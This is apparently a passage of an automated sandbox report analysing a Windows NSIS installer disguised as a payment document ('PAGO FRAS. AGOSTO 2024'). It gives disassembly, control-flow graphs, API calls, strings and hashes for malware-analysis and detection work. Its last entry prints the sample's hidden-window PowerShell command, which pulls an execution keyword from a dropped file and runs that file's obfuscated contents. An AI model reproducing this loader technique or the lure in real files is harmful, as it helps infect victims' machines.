                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 900638850-1002770640
                                                                              • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                              • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                              • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                              • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 556 4055d1-4055f7 call 40588f 559 405610-405617 556->559 560 4055f9-40560b DeleteFileA 556->560 562 405619-40561b 559->562 563 40562a-40563a call 405d2f 559->563 561 40579a-40579e 560->561 564 405621-405624 562->564 565 405748-40574d 562->565 571 405649-40564a call 4057e8 563->571 572 40563c-405647 lstrcatA 563->572 564->563 564->565 565->561 567 40574f-405752 565->567 569 405754-40575a 567->569 570 40575c-405764 call 406033 567->570 569->561 570->561 580 405766-40577a call 4057a1 call 405589 570->580 574 40564f-405652 571->574 572->574 576 405654-40565b 574->576 577 40565d-405663 lstrcatA 574->577 576->577 579 405668-405686 lstrlenA FindFirstFileA 576->579 577->579 581 40568c-4056a3 call 4057cc 579->581 582 40573e-405742 579->582 595 405792-405795 call 404f48 580->595 596 40577c-40577f 580->596 589 4056a5-4056a9 581->589 590 4056ae-4056b1 581->590 582->565 584 405744 582->584 584->565 589->590 592 4056ab 589->592 593 4056b3-4056b8 590->593 594 4056c4-4056d2 call 405d2f 590->594 592->590 598 4056ba-4056bc 593->598 599 40571d-40572f FindNextFileA 593->599 607 4056d4-4056dc 594->607 608 4056e9-4056f4 call 405589 594->608 595->561 596->569 601 405781-405790 call 404f48 call 405bea 596->601 598->594 604 4056be-4056c2 598->604 599->581 602 405735-405738 FindClose 599->602 601->561 602->582 604->594 604->599 607->599 609 4056de-4056e7 call 4055d1 607->609 616 405715-405718 call 404f48 608->616 617 4056f6-4056f9 608->617 609->599 616->599 618 4056fb-40570b call 404f48 call 405bea 617->618 619 40570d-405713 617->619 618->599 619->599
                                                                              APIs
                                                                              • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                              • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                              • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                              • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                              • FindClose.KERNEL32(00000000), ref: 00405738
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 004055D1
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                              • \*.*, xrefs: 0040563C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-3322663958
                                                                              • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                              • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                              • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                              • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                              APIs
                                                                              • FindFirstFileA.KERNELBASE(74DF3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                              • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                              • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                              • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                              • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 250 403a41-403a53 251 403b94-403ba3 250->251 252 403a59-403a5f 250->252 254 403bf2-403c07 251->254 255 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 251->255 252->251 253 403a65-403a6e 252->253 256 403a70-403a7d SetWindowPos 253->256 257 403a83-403a86 253->257 259 403c47-403c4c call 403f60 254->259 260 403c09-403c0c 254->260 255->254 256->257 262 403aa0-403aa6 257->262 263 403a88-403a9a ShowWindow 257->263 267 403c51-403c6c 259->267 265 403c0e-403c19 call 401389 260->265 266 403c3f-403c41 260->266 268 403ac2-403ac5 262->268 269 403aa8-403abd DestroyWindow 262->269 263->262 265->266 287 403c1b-403c3a SendMessageA 265->287 266->259 272 403ee1 266->272 273 403c75-403c7b 267->273 274 403c6e-403c70 call 40140b 267->274 278 403ac7-403ad3 SetWindowLongA 268->278 279 403ad8-403ade 268->279 276 403ebe-403ec4 269->276 275 403ee3-403eea 272->275 283 403c81-403c8c 273->283 284 403e9f-403eb8 DestroyWindow EndDialog 273->284 274->273 276->272 281 403ec6-403ecc 276->281 278->275 285 403b81-403b8f call 403f7b 279->285 286 403ae4-403af5 GetDlgItem 279->286 281->272 289 403ece-403ed7 ShowWindow 281->289 283->284 290 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 283->290 284->276 285->275 291 403b14-403b17 286->291 292 403af7-403b0e SendMessageA IsWindowEnabled 286->292 287->275 289->272 320 403ce1-403ce6 290->320 321 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 290->321 295 403b19-403b1a 291->295 296 403b1c-403b1f 291->296 292->272 292->291 298 403b4a-403b4f call 403eed 295->298 299 403b21-403b27 296->299 300 403b2d-403b32 296->300 298->285 301 403b68-403b7b SendMessageA 299->301 302 403b29-403b2b 299->302 300->301 303 403b34-403b3a 300->303 301->285 302->298 306 403b51-403b5a call 40140b 303->306 307 403b3c-403b42 call 40140b 303->307 306->285 317 403b5c-403b66 306->317 316 403b48 307->316 316->298 317->316 320->321 324 403d27-403d28 321->324 325 403d2a 321->325 326 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403d5c-403d6d SendMessageA 326->327 328 403d6f 326->328 329 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 327->329 328->329 329->267 338 403db4-403db6 329->338 338->267 339 403dbc-403dc0 338->339 340 403dc2-403dc8 339->340 341 403ddf-403df3 DestroyWindow 339->341 340->272 342 403dce-403dd4 340->342 341->276 343 403df9-403e26 CreateDialogParamA 341->343 342->267 344 403dda 342->344 343->276 345 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 343->345 344->272 345->272 350 403e85-403e98 ShowWindow call 403f60 345->350 352 403e9d 350->352 352->276
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                              • ShowWindow.USER32(?), ref: 00403A9A
                                                                              • DestroyWindow.USER32 ref: 00403AAE
                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                              • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                              • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                              • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                              • lstrlenA.KERNEL32(00429868,?,00429868,Blaggard Setup), ref: 00403D8E
                                                                              • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID: Blaggard Setup
                                                                              • API String ID: 3282139019-3821040904
                                                                              • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                              • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                              • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                              • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 353 4036af-4036c7 call 4060c8 356 4036c9-4036d9 call 405c8d 353->356 357 4036db-40370c call 405c16 353->357 365 40372f-403758 call 403974 call 40588f 356->365 361 403724-40372a lstrcatA 357->361 362 40370e-40371f call 405c16 357->362 361->365 362->361 371 40375e-403763 365->371 372 4037df-4037e7 call 40588f 365->372 371->372 373 403765-403789 call 405c16 371->373 378 4037f5-40381a LoadImageA 372->378 379 4037e9-4037f0 call 405d51 372->379 373->372 383 40378b-40378d 373->383 381 40389b-4038a3 call 40140b 378->381 382 40381c-40384c RegisterClassA 378->382 379->378 396 4038a5-4038a8 381->396 397 4038ad-4038b8 call 403974 381->397 384 403852-403896 SystemParametersInfoA CreateWindowExA 382->384 385 40396a 382->385 387 40379e-4037aa lstrlenA 383->387 388 40378f-40379c call 4057cc 383->388 384->381 390 40396c-403973 385->390 391 4037d2-4037da call 4057a1 call 405d2f 387->391 392 4037ac-4037ba lstrcmpiA 387->392 388->387 391->372 392->391 395 4037bc-4037c6 GetFileAttributesA 392->395 399 4037c8-4037ca 395->399 400 4037cc-4037cd call 4057e8 395->400 396->390 406 403941-403949 call 40501a 397->406 407 4038be-4038d8 ShowWindow call 40605a 397->407 399->391 399->400 400->391 412 403963-403965 call 40140b 406->412 413 40394b-403951 406->413 414 4038e4-4038f6 GetClassInfoA 407->414 415 4038da-4038df call 40605a 407->415 412->385 413->396 418 403957-40395e call 40140b 413->418 416 4038f8-403908 GetClassInfoA RegisterClassA 414->416 417 40390e-403931 DialogBoxParamA call 40140b 414->417 415->414 416->417 423 403936-40393f call 4035ff 417->423 418->396 423->390
                                                                              APIs
                                                                                • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                              • lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",00000000), ref: 0040372A
                                                                              • lstrlenA.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410), ref: 0040379F
                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                              • GetFileAttributesA.KERNEL32(Space required: ), ref: 004037BD
                                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806
                                                                                • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                              • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                              • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                              • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                              • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space required: $_Nb
                                                                              • API String ID: 1975747703-306026215
                                                                              • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                              • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                              • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                              • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 427 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 430 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 427->430 431 402cb6-402cbb 427->431 439 402cf4 430->439 440 402ddb-402de9 call 402c02 430->440 432 402e98-402e9c 431->432 441 402cf9-402d10 439->441 446 402deb-402dee 440->446 447 402e3e-402e43 440->447 444 402d12 441->444 445 402d14-402d1d call 4030b1 441->445 444->445 453 402d23-402d2a 445->453 454 402e45-402e4d call 402c02 445->454 449 402df0-402e08 call 4030c7 call 4030b1 446->449 450 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 446->450 447->432 449->447 473 402e0a-402e10 449->473 450->447 478 402e4f-402e60 450->478 457 402da6-402daa 453->457 458 402d2c-402d40 call 40595d 453->458 454->447 463 402db4-402dba 457->463 464 402dac-402db3 call 402c02 457->464 458->463 476 402d42-402d49 458->476 469 402dc9-402dd3 463->469 470 402dbc-402dc6 call 40613d 463->470 464->463 469->441 477 402dd9 469->477 470->469 473->447 473->450 476->463 482 402d4b-402d52 476->482 477->440 479 402e62 478->479 480 402e68-402e6d 478->480 479->480 483 402e6e-402e74 480->483 482->463 484 402d54-402d5b 482->484 483->483 485 402e76-402e91 SetFilePointer call 40595d 483->485 484->463 486 402d5d-402d64 484->486 490 402e96 485->490 486->463 488 402d66-402d86 486->488 488->447 489 402d8c-402d90 488->489 491 402d92-402d96 489->491 492 402d98-402da0 489->492 490->432 491->477 491->492 492->463 493 402da2-402da4 492->493 493->463
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402C77
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,00000400), ref: 00402C93
                                                                                • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004059A6
                                                                                • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 00402CDF
                                                                              Strings
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                              • Null, xrefs: 00402D5D
                                                                              • Error launching installer, xrefs: 00402CB6
                                                                              • "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 00402C66
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                              • C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                              • soft, xrefs: 00402D54
                                                                              • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                              • Inst, xrefs: 00402D4B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                              • API String ID: 4283519449-3845263885
                                                                              • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                              • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                              • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                              • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 625 401751-401774 call 402a3a call 40580e 630 401776-40177c call 405d2f 625->630 631 40177e-401790 call 405d2f call 4057a1 lstrcatA 625->631 637 401795-40179b call 405f9a 630->637 631->637 641 4017a0-4017a4 637->641 642 4017a6-4017b0 call 406033 641->642 643 4017d7-4017da 641->643 651 4017c2-4017d4 642->651 652 4017b2-4017c0 CompareFileTime 642->652 645 4017e2-4017fe call 4059a2 643->645 646 4017dc-4017dd call 40597d 643->646 653 401800-401803 645->653 654 401876-40189f call 404f48 call 402e9f 645->654 646->645 651->643 652->651 655 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 653->655 656 401858-401862 call 404f48 653->656 668 4018a1-4018a5 654->668 669 4018a7-4018b3 SetFileTime 654->669 655->641 689 40184d-40184e 655->689 666 40186b-401871 656->666 670 4028d8 666->670 668->669 672 4018b9-4018c4 CloseHandle 668->672 669->672 674 4028da-4028de 670->674 675 4018ca-4018cd 672->675 676 4028cf-4028d2 672->676 678 4018e2-4018e5 call 405d51 675->678 679 4018cf-4018e0 call 405d51 lstrcatA 675->679 676->670 684 4018ea-402273 call 405525 678->684 679->684 684->674 684->676 689->666 691 401850-401851 689->691 691->656
                                                                              APIs
                                                                              • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets,00000000,00000000,00000031), ref: 00401790
